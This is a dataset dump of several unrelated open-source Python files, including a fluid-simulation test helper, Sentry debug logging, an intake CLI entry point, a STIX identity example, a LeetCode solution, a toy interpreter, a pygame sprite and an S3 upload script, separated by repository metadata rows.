            errVal = grid4dMaxDiffVec3( grid, compareTmpGrid )
        elif ( grid._class == "Grid4d" and grid._T == "Vec4" ):
            errVal = grid4dMaxDiffVec4( grid, compareTmpGrid )
        else:
            print( "Error doTestGrid - error calculation missing" )
            return 1
        # debug mode to return difference in source grid, warning - no error measurements possible anymore
        if debugShowDifference:
            print("Warning debugShowDifference active, test data invalidated for UI display")
            grid.sub( compareTmpGrid )
            return 0
        # debug info , print min/max
        if 0:
            minVal1 = grid.getMin()
            maxVal1 = grid.getMax()
            minVal2 = compareTmpGrid.getMin()
            maxVal2 = compareTmpGrid.getMax()
            print( "Test "+name+" min/max curr "+str(minVal1)+" to "+str(maxVal1)+" min/max ref "+str(minVal2)+" to "+str(maxVal2) );
        # small epsilon avoids division by zero for all-zero grids
        maxVal = grid.getMaxAbs() + 1e-15
        errValRel = errVal/maxVal
        # finally, compare max error to allowed threshold, and return result
        return checkResult( name, errVal , errValRel, threshold , thresholdStrict, invertResult )
# ------------------------------------------------------------------------------------------
# smaller helpers (directories, global settings)
# for xl test, load test data afterwards to keep sims in sync
def doTestDataLoad( file , name, solver , grid ):
    """In non-generation runs, load the stored reference data into *grid*.

    Used by the xl tests to keep simulations in sync; *solver* is unused but
    kept for call-site compatibility.
    """
    if getGenRefFileSetting() == 1:
        return
    rfile = referenceFilename( file, name )
    print( "Loading %s" % rfile )
    grid.load( rfile )
# reset and generate info file with version string when in data gen mode
def doResetInfoFile( file ):
    """Reset the test-data info file and write the current build info.

    Only active in data-generation mode (MANTA_GEN_TEST_DATA=1); otherwise a
    no-op.
    """
    if(getGenRefFileSetting()==1):
        infofilename = dataDirectory(file)+"/test_data_info.txt"
        print( "Resetting test data info file "+infofilename )
        # reuse the computed path and close the handle even if the write
        # fails (previously the path was rebuilt and the file left to GC)
        with open(infofilename, "w") as text_file:
            text_file.write( "\n%s\n\n" % (str(printBuildInfo())) )
# read test data
# try to load uni file if it exists
def tryToGetSize( basename, suffix, number , appendNumber ):
    """Return the grid size stored in a reference uni file.

    When appendNumber is True, "_NNNN" (zero-padded *number*) is appended to
    the suffix. Returns vec3(0,0,0) when the file does not exist.
    """
    fullSuffix = suffix + ("_%04d" % number) if appendNumber == True else suffix
    rfile = referenceFilename( basename, fullSuffix )
    if not os.path.isfile(rfile):
        return vec3(0, 0, 0)
    return getUniFileSize(rfile)
# configure input filenames
# try to load uni file if it exists
def tryToLoad( grid, basename, suffix, number , appendNumber , buildInfo ):
    """Load a reference uni file into *grid* if present, otherwise clear it.

    When appendNumber is True, "_NNNN" (zero-padded *number*) is appended to
    the suffix; buildInfo==1 additionally prints the file's header info.
    Always returns 1.
    """
    if appendNumber == True:
        suffix = suffix + ("_%04d" % number)
    rfile = referenceFilename( basename, suffix )
    print("Trying to load " + rfile)
    if not os.path.isfile(rfile):
        grid.clear()
        return 1
    grid.load(rfile)
    if buildInfo == 1:
        # more detailed build info stored in the file header
        printUniFileInfoString(rfile)
    return 1
| 7,720 | 0 | 133 |
0a20c06ff463c05d267ec94c8d6e0ff76393e309 | 152 | py | Python | gym_marl_reconnaissance/__init__.py | JacopoPan/gym-marl-reconnaissance | 85a4373f3ebee66b12c88a0bdd5e4e96f9606e5a | [
"MIT"
] | 4 | 2021-08-29T20:13:38.000Z | 2022-02-28T02:39:17.000Z | gym_marl_reconnaissance/__init__.py | JacopoPan/gym-marl-reconnaissance | 85a4373f3ebee66b12c88a0bdd5e4e96f9606e5a | [
"MIT"
] | 1 | 2022-02-28T02:26:04.000Z | 2022-03-22T15:30:58.000Z | gym_marl_reconnaissance/__init__.py | JacopoPan/gym-marl-reconnaissance | 85a4373f3ebee66b12c88a0bdd5e4e96f9606e5a | [
"MIT"
] | null | null | null | from gym.envs.registration import register
# Register the custom environment with Gym so it can be created via
# gym.make('recon-arena-v0').
register(
    id='recon-arena-v0',
    entry_point='gym_marl_reconnaissance.envs.recon_arena:ReconArena',
)
| 21.714286 | 70 | 0.776316 | from gym.envs.registration import register
# Register the custom environment with Gym so it can be created via
# gym.make('recon-arena-v0').
register(
    id='recon-arena-v0',
    entry_point='gym_marl_reconnaissance.envs.recon_arena:ReconArena',
)
| 0 | 0 | 0 |
9c220a151084c5a15cafe9c0fb7e9461558a125f | 165 | py | Python | aliyun/dns/__init__.py | getlantern/python-aliyun | 524ccdc991f952433b2636a94266d31b00823f66 | [
"Apache-2.0"
] | 38 | 2015-05-21T05:59:14.000Z | 2018-11-28T09:14:07.000Z | aliyun/dns/__init__.py | getlantern/python-aliyun | 524ccdc991f952433b2636a94266d31b00823f66 | [
"Apache-2.0"
] | 16 | 2015-03-20T17:55:41.000Z | 2018-05-15T15:09:15.000Z | aliyun/dns/__init__.py | getlantern/python-aliyun | 524ccdc991f952433b2636a94266d31b00823f66 | [
"Apache-2.0"
] | 27 | 2015-03-16T18:32:16.000Z | 2020-11-30T05:28:06.000Z | """
Aliyun DNS
==========
The following DNS API actions are nearly fully supported:
* AddDomainRecord
* DeleteDomainRecord
* DescribeDomainRecords
"""
| 15 | 57 | 0.672727 | """
Aliyun DNS
==========
The following DNS API actions are nearly fully supported:
* AddDomainRecord
* DeleteDomainRecord
* DescribeDomainRecords
"""
| 0 | 0 | 0 |
7ceb822675136513e97564061b6f57e8cccf5494 | 1,037 | py | Python | sentry_sdk/debug.py | Siecje/sentry-python | d8405491c60c5b7c3d2ec3ed97ab4bea104f4e51 | [
"BSD-2-Clause"
] | 1 | 2020-11-02T11:31:01.000Z | 2020-11-02T11:31:01.000Z | sentry_sdk/debug.py | Siecje/sentry-python | d8405491c60c5b7c3d2ec3ed97ab4bea104f4e51 | [
"BSD-2-Clause"
] | null | null | null | sentry_sdk/debug.py | Siecje/sentry-python | d8405491c60c5b7c3d2ec3ed97ab4bea104f4e51 | [
"BSD-2-Clause"
] | null | null | null | import sys
import logging
from sentry_sdk import utils
from sentry_sdk.hub import Hub
from sentry_sdk.utils import logger
from sentry_sdk.client import _client_init_debug
from logging import LogRecord
| 25.292683 | 84 | 0.711668 | import sys
import logging
from sentry_sdk import utils
from sentry_sdk.hub import Hub
from sentry_sdk.utils import logger
from sentry_sdk.client import _client_init_debug
from logging import LogRecord
class _HubBasedClientFilter(logging.Filter):
    """Pass SDK log records through only when debug logging is enabled."""

    def filter(self, record):
        # type: (LogRecord) -> bool
        # While a client is being initialized, always emit debug output.
        if _client_init_debug.get(False):
            return True
        # Otherwise defer to the active client's "debug" option, if any.
        hub = Hub.current
        if hub is None or hub.client is None:
            return False
        return hub.client.options["debug"]
def init_debug_support():
    # Install the stderr log handler only once, then patch the debug-hub hook.
    if not logger.handlers:
        configure_logger()
    configure_debug_hub()
def configure_logger():
    # Send SDK log output to stderr with a "[sentry]" prefix.
    _handler = logging.StreamHandler(sys.stderr)
    _handler.setFormatter(logging.Formatter(" [sentry] %(levelname)s: %(message)s"))
    logger.addHandler(_handler)
    logger.setLevel(logging.DEBUG)
    # Records are suppressed unless debug mode is active (see the filter).
    logger.addFilter(_HubBasedClientFilter())
def configure_debug_hub():
    # Monkey-patch sentry_sdk.utils with a callback returning the current hub,
    # presumably so utils can reach the hub without importing it directly
    # (avoiding an import cycle) -- TODO confirm.
    def _get_debug_hub():
        return Hub.current
    utils._get_debug_hub = _get_debug_hub
| 690 | 23 | 118 |
600e214504ee1a81a112be83452958bb2542ebd5 | 2,117 | py | Python | intake/cli/bootstrap.py | gramhagen/intake | de4cbb5df78881dc166b1f02743d22067f2bbd78 | [
"BSD-2-Clause"
] | 578 | 2019-02-22T11:45:28.000Z | 2022-03-31T08:32:22.000Z | intake/cli/bootstrap.py | gramhagen/intake | de4cbb5df78881dc166b1f02743d22067f2bbd78 | [
"BSD-2-Clause"
] | 336 | 2019-02-21T16:24:33.000Z | 2022-03-30T09:23:53.000Z | intake/cli/bootstrap.py | gramhagen/intake | de4cbb5df78881dc166b1f02743d22067f2bbd78 | [
"BSD-2-Clause"
] | 99 | 2019-02-22T18:31:09.000Z | 2022-03-22T03:27:54.000Z | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. and Intake contributors
# All rights reserved.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a ``main`` function to run intake commands.
'''
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import argparse
# External imports
# Intake imports
from intake import __version__
from intake.cli.util import die, nice_join
#-----------------------------------------------------------------------------
# API
#-----------------------------------------------------------------------------
def main(description, subcommands, argv):
    ''' Execute an intake command.
    Args:
        description (str) :
            A description for this top-level command
        subcommands (seq[SubCommand]) :
            A list of subcommands to configure for argparse
        argv (seq[str]) :
            A list of command line arguments to process
    Returns:
        None
    '''
    # argv[0] is the program name; with nothing else there is no subcommand
    if len(argv) == 1:
        die("ERROR: Must specify subcommand, one of: %s" % nice_join(x.name for x in subcommands))
    parser = argparse.ArgumentParser(
        prog=argv[0],
        description=description,
        epilog="See '<command> --help' to read about a specific subcommand.")
    parser.add_argument('-v', '--version', action='version', version=__version__)
    subs = parser.add_subparsers(help="Sub-commands")
    # Each SubCommand class registers itself on its own sub-parser; the
    # instance's invoke() becomes the default action for that subcommand.
    for cls in subcommands:
        subparser = subs.add_parser(cls.name, help=cls.__doc__.strip())
        subcommand = cls(parser=subparser)
        subparser.set_defaults(invoke=subcommand.invoke)
    args = parser.parse_args(argv[1:])
    try:
        return args.invoke(args) or 0 # convert None to 0
    except Exception as e:
        # top-level boundary: turn any failure into an error exit
        die("ERROR: " + repr(e))
| 30.242857 | 98 | 0.512518 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. and Intake contributors
# All rights reserved.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a ``main`` function to run intake commands.
'''
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import argparse
# External imports
# Intake imports
from intake import __version__
from intake.cli.util import die, nice_join
#-----------------------------------------------------------------------------
# API
#-----------------------------------------------------------------------------
def main(description, subcommands, argv):
    ''' Execute an intake command.

    Args:
        description (str) :
            A description for this top-level command
        subcommands (seq[SubCommand]) :
            A list of subcommands to configure for argparse
        argv (seq[str]) :
            A list of command line arguments to process

    Returns:
        None
    '''
    # argv[0] is the program name; with nothing else there is no subcommand.
    if len(argv) == 1:
        die("ERROR: Must specify subcommand, one of: %s" % nice_join(x.name for x in subcommands))

    top_parser = argparse.ArgumentParser(
        prog=argv[0],
        description=description,
        epilog="See '<command> --help' to read about a specific subcommand.")
    top_parser.add_argument('-v', '--version', action='version', version=__version__)

    sub_parsers = top_parser.add_subparsers(help="Sub-commands")
    # Wire each SubCommand class to its own sub-parser; the instance's
    # invoke() becomes the default action for that subcommand.
    for command_class in subcommands:
        command_parser = sub_parsers.add_parser(command_class.name, help=command_class.__doc__.strip())
        command = command_class(parser=command_parser)
        command_parser.set_defaults(invoke=command.invoke)

    parsed = top_parser.parse_args(argv[1:])
    try:
        # invoke() may return None on success; normalize that to exit code 0.
        return parsed.invoke(parsed) or 0
    except Exception as e:
        die("ERROR: " + repr(e))
| 0 | 0 | 0 |
4af96fc1ae5139effbf1471a3d5a99c044bf84e9 | 1,828 | py | Python | solutions/0242-valid-anagram/valid-anagram.py | iFun/Project-G | d33b3b3c7bcee64f93dc2539fd9955a27f321d96 | [
"MIT"
] | null | null | null | solutions/0242-valid-anagram/valid-anagram.py | iFun/Project-G | d33b3b3c7bcee64f93dc2539fd9955a27f321d96 | [
"MIT"
] | null | null | null | solutions/0242-valid-anagram/valid-anagram.py | iFun/Project-G | d33b3b3c7bcee64f93dc2539fd9955a27f321d96 | [
"MIT"
] | null | null | null | # Given two strings s and t , write a function to determine if t is an anagram of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your solution to such case?
#
#
# @lc app=leetcode id=242 lang=python3
#
# [242] Valid Anagram
#
# https://leetcode.com/problems/valid-anagram/description/
#
# algorithms
# Easy (52.65%)
# Likes: 751
# Dislikes: 112
# Total Accepted: 357K
# Total Submissions: 678K
# Testcase Example: '"anagram"\n"nagaram"'
#
# Given two strings s and t , write a function to determine if t is an anagram
# of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your
# solution to such case?
#
#
| 19.869565 | 97 | 0.571116 | # Given two strings s and t , write a function to determine if t is an anagram of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your solution to such case?
#
#
# @lc app=leetcode id=242 lang=python3
#
# [242] Valid Anagram
#
# https://leetcode.com/problems/valid-anagram/description/
#
# algorithms
# Easy (52.65%)
# Likes: 751
# Dislikes: 112
# Total Accepted: 357K
# Total Submissions: 678K
# Testcase Example: '"anagram"\n"nagaram"'
#
# Given two strings s and t , write a function to determine if t is an anagram
# of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your
# solution to such case?
#
#
class Solution:
    """LeetCode 242: determine whether two strings are anagrams."""

    def isAnagram(self, s: str, t: str) -> bool:
        """Return True iff *t* is a rearrangement of the characters of *s*.

        Counts the characters of s, then decrements while scanning t; any
        missing or surplus character means the strings are not anagrams.
        Runs in O(len(s) + len(t)) time.
        """
        if len(s) != len(t):
            return False
        counts = {}
        for char in s:
            counts[char] = counts.get(char, 0) + 1
        for char in t:
            if char not in counts:
                # char is absent from s, or already fully consumed
                return False
            counts[char] -= 1
            if counts[char] == 0:
                # use ==, not "is": identity comparison of ints is an
                # implementation detail (and a SyntaxWarning since 3.8)
                del counts[char]
        # equal lengths and every count consumed => anagram
        return not counts
| 651 | -6 | 49 |
5b3660b9d00705aa230281fe180336f75f2007d3 | 3,568 | py | Python | interpreter/theRealLiner.py | Crain-32/Liner | 4656d086425877fbd50f23f383222cf85220012f | [
"Apache-2.0"
] | 1 | 2021-08-04T00:59:43.000Z | 2021-08-04T00:59:43.000Z | interpreter/theRealLiner.py | Crain-32/Liner | 4656d086425877fbd50f23f383222cf85220012f | [
"Apache-2.0"
] | null | null | null | interpreter/theRealLiner.py | Crain-32/Liner | 4656d086425877fbd50f23f383222cf85220012f | [
"Apache-2.0"
] | null | null | null | """
*`prin` Prints the results of all the following function, and the numeric value
of any namespace.
*`let` converts an integer into its Unicode character.
*`if` returns the highest number of two different namespaces/function
*`set` override the numeric value of a namespace, and replaces the original in duplicate cases.
*`run` Run the function at the given numeric property, if no function is there, crashes.
*`add` add two numeric properties
*`sub` subtracts two numeric properties
*`split` run two functions
"""
| 33.037037 | 95 | 0.60454 | """
*`prin` Prints the results of all the following function, and the numeric value
of any namespace.
*`let` converts an integer into its Unicode character.
*`if` returns the highest number of two different namespaces/function
*`set` override the numeric value of a namespace, and replaces the original in duplicate cases.
*`run` Run the function at the given numeric property, if no function is there, crashes.
*`add` add two numeric properties
*`sub` subtracts two numeric properties
*`split` run two functions
"""
class Liner:
    """Interpreter for the tiny "Liner" language described above.

    State:
        namespaces: name -> numeric value
        reverseLookup: numeric value -> name (inverse of namespaces)
        functionLookup: name -> source line (the "function" bound to a name)
        entranceLine: the line executed first by start()
    """
    def __init__(self):
        self.namespaces = dict()
        self.reverseLookup = dict()
        self.functionLookup = dict()
        self.entranceLine = ""
    def addNamespace(self, namespace, numeric, function):
        # Register a name with its numeric value and attached function line.
        self.namespaces.update({namespace : numeric})
        self.reverseLookup.update({numeric : namespace})
        self.functionLookup.update({namespace : function})
    def setEntranceLine(self, function):
        # The program's entry point, executed by start().
        self.entranceLine = function
    def prin(self, function):
        # Evaluate each space-separated token and print the concatenation.
        functs = function.split(" ")
        output = ""
        for func in functs:
            output += str(self.runLine(func))
        print(output)
    def ifStatement(self, numericOne, numericTwo):
        # Return the larger operand. NOTE(review): runLine passes the raw
        # substrings here, so this compares strings rather than resolved
        # numeric values -- confirm whether that is intended.
        return numericOne if (numericOne > numericTwo) else numericTwo
    def setNamespace(self, namespace, numeric):
        # Non-digit operands are evaluated first (namespace or "name()" call).
        if not numeric.isdigit():
            numeric = self.evalLine(numeric)
        self.namespaces.update({namespace : numeric})
        self.reverseLookup.update({numeric : namespace})
    def runFunction(self, numeric):
        # Run the function of the namespace whose numeric value is `numeric`.
        if not numeric.isdigit():
            numeric = self.evalLine(numeric)
        return self.runLine(self.functionLookup[self.reverseLookup[numeric]])
    def splitOperation(self, namespaceOne, namespaceTwo):
        # Run both operands' functions; "[:-2]" strips a trailing "()".
        self.runLine(self.functionLookup[namespaceOne[:-2]])
        self.runLine(self.functionLookup[namespaceTwo[:-2]])
    def inStatement(self):
        # Read an integer from stdin.
        return int(input("Number: "))
    def evalLine(self, line):
        # "name()" runs the function bound to `name`; an empty line exits
        # the interpreter; anything else resolves to a namespace's value.
        if line.endswith("()"):
            namespace = line.split("()")[0].strip()
            return self.runLine(self.functionLookup[namespace])
        elif len(line) == 0:
            exit(0)
        else:
            return self.namespaces[line.strip()]
    def start(self):
        # Begin execution at the configured entrance line.
        self.runLine(self.entranceLine)
    def runLine(self, line):
        # Dispatch on the first keyword found by *substring* match.
        # NOTE(review): substring tests mean a namespace containing e.g.
        # "if" or "in" would be misdispatched; check order also matters
        # ("prin" must be tested before "in").
        if 'prin' in line:
            self.prin(line.split("prin ")[1])
        elif 'let' in line:
            # Convert a namespace's numeric value to its Unicode character.
            return chr(self.namespaces[line.split("let ")[1]])
        elif 'if' in line:
            args = line.split(" if ")
            return self.ifStatement(args[0], args[1])
        elif 'set' in line:
            args = line.split("set ")[1].split(" ")
            self.setNamespace(args[0], args[1])
        elif 'run' in line:
            return self.runFunction(line.split("run ")[1])
        elif 'add' in line:
            args = line.split(" add ")
            first = int(self.namespaces[args[0].strip()])
            second = int(self.namespaces[args[1].strip()])
            return first + second
        elif 'sub' in line:
            args = line.split(" sub ")
            first = int(self.namespaces[args[0].strip()])
            second = int(self.namespaces[args[1].strip()])
            return first - second
        elif 'split' in line:
            args = line.split(" split ")
            return self.splitOperation(args[0], args[1])
        elif line.strip() == 'in':
            return self.inStatement()
        else:
            return self.evalLine(line)
| 2,713 | -9 | 346 |
8be2210037ef9e111391e66eb0f8edd82c0e78a5 | 1,095 | py | Python | recognition/recongitions.py | HermasTV/uol_face_detection_recognition | 7622fb23c31651cb25fc995bcdaabffd8f24a1a1 | [
"MIT"
] | null | null | null | recognition/recongitions.py | HermasTV/uol_face_detection_recognition | 7622fb23c31651cb25fc995bcdaabffd8f24a1a1 | [
"MIT"
] | null | null | null | recognition/recongitions.py | HermasTV/uol_face_detection_recognition | 7622fb23c31651cb25fc995bcdaabffd8f24a1a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""detectors.py: contains face detectors modules."""
__author__ = "Ahmed Hermas"
__copyright__ = "Copyright 2022, © UOL "
__license__ = "MIT"
__version__ = "0.0.1"
__email__ = "a7medhermas@gmail.com"
import os
import torch
from cv2 import cv2
import utils
import numpy as np
from Siamese_resnet18 import myResNet
| 28.076923 | 82 | 0.673059 | #!/usr/bin/env python3
"""detectors.py: contains face detectors modules."""
__author__ = "Ahmed Hermas"
__copyright__ = "Copyright 2022, © UOL "
__license__ = "MIT"
__version__ = "0.0.1"
__email__ = "a7medhermas@gmail.com"
import os
import torch
from cv2 import cv2
import utils
import numpy as np
from Siamese_resnet18 import myResNet
class Encoder ():
    """Loader for a face-embedding encoder network."""
    def __init__(self, encoder_name):
        # Name of the encoder backend; only ResNet-18 handling is visible here.
        self.encoder_name = encoder_name
    def _load_vgg_encoder(self):
        # NOTE(review): despite the "vgg" name this downloads and loads
        # ResNet-18 weights, and the constructed model is neither stored on
        # self nor returned -- looks like a missing `return model`; confirm.
        weights_link = "https://download.pytorch.org/models/resnet18-5c106cde.pth"
        weights_path = "recognition/assets/resnet18.pth"
        if not os.path.exists(weights_path):
            print("path not found,Downloading model weights")
            utils.download_url(weights_link,weights_path)
        model = myResNet()
        model.load_state_dict(torch.load(weights_path))
def euclidean_distance(a, b):
    """Return the Euclidean distance between L2-normalized copies of a and b.

    Both inputs are normalized to unit length before the distance is taken
    (the 1e-10 floor guards against division by zero for all-zero vectors).
    Unlike the previous version, the caller's arrays are NOT mutated: the
    in-place `/=` both clobbered the inputs and raised a casting error for
    integer arrays.

    Args:
        a, b: array-like embedding vectors of equal shape.

    Returns:
        Scalar (numpy float) distance in [0, 2].
    """
    a = a / np.sqrt(np.maximum(np.sum(np.square(a)), 1e-10))
    b = b / np.sqrt(np.maximum(np.sum(np.square(b)), 1e-10))
    return np.sqrt(np.sum(np.square(a - b)))
| 645 | -4 | 115 |
ae0166d5856fe574d19d0263006e54665d49d87a | 2,825 | py | Python | examples/ciq_identity.py | saegel/python-stix | a777aafa2573d5e66233e29b1909ce178f643891 | [
"BSD-3-Clause"
] | 194 | 2015-02-20T17:52:06.000Z | 2022-03-06T07:29:08.000Z | examples/ciq_identity.py | saegel/python-stix | a777aafa2573d5e66233e29b1909ce178f643891 | [
"BSD-3-Clause"
] | 136 | 2015-01-12T05:33:35.000Z | 2022-03-12T07:41:42.000Z | examples/ciq_identity.py | saegel/python-stix | a777aafa2573d5e66233e29b1909ce178f643891 | [
"BSD-3-Clause"
] | 82 | 2015-01-05T14:46:16.000Z | 2022-03-30T06:00:45.000Z | #!/usr/bin/env python
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
"""
Description: An example of how to add CIQ Identity information to a STIX
Indicator.
"""
# stdlib
from pprint import pprint
# python-cybox
from cybox.objects.file_object import File
# python-stix
import stix.utils as utils
from stix.core import STIXPackage, STIXHeader
from stix.indicator import Indicator
import stix.extensions.identity.ciq_identity_3_0 as stix_ciq
if __name__ == '__main__':
main()
| 31.043956 | 78 | 0.722478 | #!/usr/bin/env python
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
"""
Description: An example of how to add CIQ Identity information to a STIX
Indicator.
"""
# stdlib
from pprint import pprint
# python-cybox
from cybox.objects.file_object import File
# python-stix
import stix.utils as utils
from stix.core import STIXPackage, STIXHeader
from stix.indicator import Indicator
import stix.extensions.identity.ciq_identity_3_0 as stix_ciq
def main():
    """Build a STIX Package whose Indicator producer uses a CIQ Identity,
    then print it as XML and as a dictionary."""
    # Create a CybOX File Object with a contained hash
    f = File()
    f.add_hash("4EC0027BEF4D7E1786A04D021FA8A67F")
    # Create an Indicator with the File Hash Object created above.
    indicator = Indicator()
    indicator.title = "File Hash Example"
    indicator.description = (
        "An indicator containing a File observable with an associated hash"
    )
    # NOTE(review): this string identity is replaced by the CIQ identity
    # below; it only exists to demonstrate the simple-string form.
    indicator.set_producer_identity("The MITRE Corporation")
    indicator.set_produced_time(utils.dates.now())
    # Add The File Object to the Indicator. This will promote the CybOX Object
    # to a CybOX Observable internally.
    indicator.add_object(f)
    # Build our STIX CIQ Identity object
    party_name = stix_ciq.PartyName(
        name_lines=("Foo", "Bar"),
        person_names=("John Smith", "Jill Smith"),
        organisation_names=("Foo Inc.", "Bar Corp.")
    )
    ident_spec = stix_ciq.STIXCIQIdentity3_0(party_name=party_name)
    ident_spec.add_electronic_address_identifier("jsmith@example.com")
    ident_spec.add_free_text_line("Demonstrating Free Text!")
    ident_spec.add_contact_number("555-555-5555")
    ident_spec.add_contact_number("555-555-5556")
    # Build and add a CIQ Address
    addr = stix_ciq.Address(
        free_text_address='1234 Example Lane.',
        country='USA',
        administrative_area='An Admin Area'
    )
    ident_spec.add_address(addr)
    # Build and add a nationality
    nationality = stix_ciq.Country("Norway")
    ident_spec.add_nationality(nationality)
    identity = stix_ciq.CIQIdentity3_0Instance(specification=ident_spec)
    # Set the Indicator producer identity to our CIQ Identity
    indicator.set_producer_identity(identity)
    # Build our STIX Package
    stix_package = STIXPackage()
    # Build a STIX Header and add a description
    stix_header = STIXHeader()
    stix_header.description = "STIX CIQ Identity Extension Example"
    # Set the STIX Header on our STIX Package
    stix_package.stix_header = stix_header
    # Add our Indicator object. The add() method will inspect the input and
    # append it to the `stix_package.indicators` collection.
    stix_package.add(indicator)
    # Print the XML!
    print(stix_package.to_xml())
    # Print a dictionary!
    pprint(stix_package.to_dict())
if __name__ == '__main__':
main()
| 2,263 | 0 | 23 |
e3b7626d09367b525a8b131aacf60f75a7a8d063 | 793 | py | Python | bomb.py | eric2007/Python-game-of-bomb-finder | 2b5c80363d2d829c199fac480345e0176021882d | [
"MIT"
] | null | null | null | bomb.py | eric2007/Python-game-of-bomb-finder | 2b5c80363d2d829c199fac480345e0176021882d | [
"MIT"
] | null | null | null | bomb.py | eric2007/Python-game-of-bomb-finder | 2b5c80363d2d829c199fac480345e0176021882d | [
"MIT"
] | null | null | null | import pygame
| 30.5 | 65 | 0.554855 | import pygame
class Bomb(pygame.sprite.Sprite):
    """Board sprite for a bomb that can be revealed (shown) or hidden."""

    def __init__(self, color, x, y):
        super().__init__()
        # A bomb starts concealed; `update` swaps the artwork accordingly.
        self.isHidden = True
        self.color = color
        self.image = pygame.image.load(r'empty.gif')
        self.rect = self.image.get_rect()
        self.rect.topleft = [x, y]

    def update(self):
        """Refresh the sprite image to match the current hidden/shown state."""
        if self.isHidden:
            self.image = pygame.image.load(r'empty.gif')
        elif self.color == 'red':
            self.image = pygame.image.load(r'gif\bomb-r.gif')
        else:
            self.image = pygame.image.load(r'gif\bomb-b.gif')

    def show(self):
        """Reveal the bomb on the next update."""
        self.isHidden = False

    def hide(self):
        """Conceal the bomb on the next update."""
        self.isHidden = True

    def setPos(self, x, y):
        """Move the sprite's top-left corner to (x, y)."""
        self.rect.topleft = [x, y]
| 605 | 12 | 152 |
27682f03712aaa784ac0638f01a7479a671b0930 | 1,465 | py | Python | src/s3_transfer.py | rkaahean/weather-scrape | b85a22151e19429e83e71531943bc6766b20304e | [
"Apache-2.0"
] | null | null | null | src/s3_transfer.py | rkaahean/weather-scrape | b85a22151e19429e83e71531943bc6766b20304e | [
"Apache-2.0"
] | 4 | 2020-05-07T09:31:24.000Z | 2020-05-08T06:46:13.000Z | src/s3_transfer.py | rkaahean/weather-scrape | b85a22151e19429e83e71531943bc6766b20304e | [
"Apache-2.0"
import boto3
import configparser
import logging
from datetime import datetime
from botocore.exceptions import NoCredentialsError
import os
import sys
from pathlib import Path
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from src.constants import FILE_NAME
"""
Setting up s3 destination structure.
"""
# Destination key is partitioned by run time: YYYY/MM/DD/HH.csv
day = datetime.now()
S3_FILE_KEY = str(day.year) + '/' + str(day.month) + '/' \
              + str(day.day) + '/' + str(day.hour) + '.csv'
"""
Setting up logging.
"""
sc_log = logging.getLogger(__name__)
sc_log.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
DIRECTORY = 'logs/transfer/' + str(day.year) + '/' + str(day.month) + '/' + str(day.day) + '/'
Path(DIRECTORY).mkdir(parents=True, exist_ok=True)
handler = logging.FileHandler(DIRECTORY + str(day.hour) + '.log')
# Bug fix: the formatter was created but never attached to the handler,
# so the log file used the default record format instead of the one above.
handler.setFormatter(formatter)
sc_log.addHandler(handler)
"""
Loading in the KEYS
"""
config = configparser.ConfigParser()
config.read('config.ini')
ACCESS_KEY = config['AWS']['ACCESS_KEY']
SECRET_KEY = config['AWS']['SECRET_KEY']
"""
File related constants
"""
# Upload the scraped CSV to S3; expected failures are logged, not raised.
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
try:
    s3.upload_file(FILE_NAME, 'weather-scrape-bucket', S3_FILE_KEY)
    sc_log.log(logging.DEBUG, "Completed S3 upload.")
except FileNotFoundError:
    sc_log.exception("The file was not found.")
except NoCredentialsError:
    sc_log.exception("There is an issue with the credentials.")
| 22.19697 | 94 | 0.711263 | import boto3
import configparser
import logging
from datetime import datetime
from botocore.exceptions import NoCredentialsError
import os
import sys
from pathlib import Path
# NOTE(review): the matching `import boto3` appears on a mangled line just
# above this span; boto3 is referenced below when creating the client.
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from src.constants import FILE_NAME
"""
Setting up s3 destination structure.
"""
# Destination key is partitioned by run time: YYYY/MM/DD/HH.csv
day = datetime.now()
S3_FILE_KEY = str(day.year) + '/' + str(day.month) + '/' \
              + str(day.day) + '/' + str(day.hour) + '.csv'
"""
Setting up logging.
"""
sc_log = logging.getLogger(__name__)
sc_log.setLevel(logging.DEBUG)
# NOTE(review): `formatter` is created but never attached to the handler
# (no handler.setFormatter call), so log records use the default format.
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
DIRECTORY = 'logs/transfer/' + str(day.year) + '/' + str(day.month) + '/' + str(day.day) + '/'
Path(DIRECTORY).mkdir(parents=True, exist_ok=True)
handler = logging.FileHandler(DIRECTORY + str(day.hour) + '.log')
sc_log.addHandler(handler)
"""
Loading in the KEYS
"""
# AWS credentials are read from a local config.ini (section [AWS]).
config = configparser.ConfigParser()
